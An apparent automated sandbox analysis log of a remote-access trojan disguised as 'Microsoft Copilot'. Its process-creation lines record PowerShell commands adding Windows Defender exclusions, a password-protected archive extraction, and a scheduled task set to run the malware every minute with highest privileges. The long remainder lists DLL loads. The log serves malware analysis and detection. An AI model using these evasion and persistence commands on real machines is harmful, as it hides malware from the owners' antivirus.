                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Users\user\AppData\Local\Temp\Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"Jump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: sspicli.dll
